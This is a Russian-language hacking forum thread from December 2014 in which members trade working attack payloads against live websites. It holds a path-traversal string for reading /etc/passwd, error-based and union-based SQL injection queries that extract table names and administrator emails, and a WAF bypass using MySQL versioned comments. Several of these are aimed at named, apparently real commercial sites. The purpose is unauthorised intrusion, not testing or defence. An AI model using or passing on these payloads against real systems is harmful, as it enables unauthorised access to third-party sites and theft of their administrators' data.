Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Есть скрипт
    echo file_get_contents('fike_'.$_GET['file']);
    есть идеи как прочитать index.php или еще что нибудь??)
     
  2. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    с друпалом разобрался через бд и админку можно проифреймить как раз через блоки
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    .php?file=/../../../../../etc/passwd
    .php?file=/../index.php

    PS. Br@!ns,
    Code:
    https://www.phd-fitness.co.uk/store/user_account.php?lang=1%27+and+substr%28@@version,1,1%29=5--+
    скобки там фильтруются, однако урл-кодирование решит эту проблему :)
     
    _________________________
    #23663 yarbabin, 4 Dec 2014
    Last edited: 4 Dec 2014
  4. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    69
    Likes Received:
    6
    Reputations:
    10
    есть уязвимость или нет, не могу понять?
    было бы не плохо слить материалы для печати)
     
  5. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    По линку нет.

    route - не динамический параметр:
    /u/index.php?product_id=36103

    product_id - int casting:
    /u/index.php?product_id=36103x
    /u/index.php?product_id=x36103
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    с чего вы взяли? нет.
     
    _________________________
  7. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    ppppppppppppp млин ...

    подскажите

    запрос пост

    &more[]=-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((database()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

    ответ

    Duplicate entry 'ex_info:1' for key 'group_key'

    ну блин а дальше тупик,как зти таблицы вытащить((
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1,1),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
    и перебирайте лимитом все поля :)
    и, кстати, можно проще запрос
    Code:
    and(extractvalue(1,concat(0x3a,(select+table_name+from+information_schema.tables+limit+5,1))))
    UPDATE:
    Code:
    1'and(extractvalue(1,concat(0x3a,(select+table_name+from+information_schema.tables+limit+5,1))))='1
    вот так должно сработать
     
    _________________________
    #23668 yarbabin, 7 Dec 2014
    Last edited: 7 Dec 2014
  9. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    спасибо ,вот проще не идёт

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '";}',
     
  10. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    можно ещё вопросик

    что я опять делаю не так

    (SELECT COUNT(*),CONCAT((SELECT id FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

    возращает 16

    а

    (SELECT COUNT(*),CONCAT((SELECT email FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

    возращает

    Subquery returns more than 1 row
    (((
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    попробуйте так:
    Code:
    (SELECT COUNT(*),CONCAT((SELECT email FROM administrators WHERE id = 16),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
    изменив на нужный id.
     
    _________________________
  12. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    ((
    Subquery returns more than 1 row
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((SELECT substr(group_concat(email),1,150) FROM administrator),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
    если проблема не решится, отпишите мне в jabber, не стоит захламлять тему. вам бы для начала прочитать маны mysql неплохо бы было.
     
    _________________________
  14. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    Спасибо,почти решилась,дальше разберусь
     
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Code:
    (SELECT COUNT(*),CONCAT((SELECT mid(email,1,20) FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
     
    _________________________
  16. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    есть

    user() фильтрует, как я понял "table_name" фильтрует, мб кто подскажет что нибудь? :)

    PS много запросов не делайте часто, забанит
     
  17. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    Code:
    http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),1,31))from(information_schema.tables)))))='1
    
    http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),32,63))from(information_schema.tables)))))='1
    
     
    3 people like this.
  18. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    как обойти такую WAF?

    HTML:
    https://www.swallowtailfarms.com/store/?cat_id=43'+order+by+5+--+
    HTML:
    https://www.swallowtailfarms.com/store/?cat_id=43'+union(select(1,2,3,4))+--+
    фильтрует комбинацию union+select и concat
     
  19. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Старая версия модсесурити. В скрипте два запроса подряд с разным количеством полей, 4 и 7.

    Code:
    /store/?cat_id=43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x
     
    2 people like this.
  20. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25

    а как дальше вот это обойти можно? :)

    HTML:
    https://www.swallowtailfarms.com//store/?cat_id=43'/*!50000union*/+/*!50000select*/+1,2,table_name,4,5,version(),7+from/**/information_schema.tables--%20
    
     
    #23680 Br@!ns, 9 Dec 2014
    Last edited: 9 Dec 2014
Thread Status:
Not open for further replies.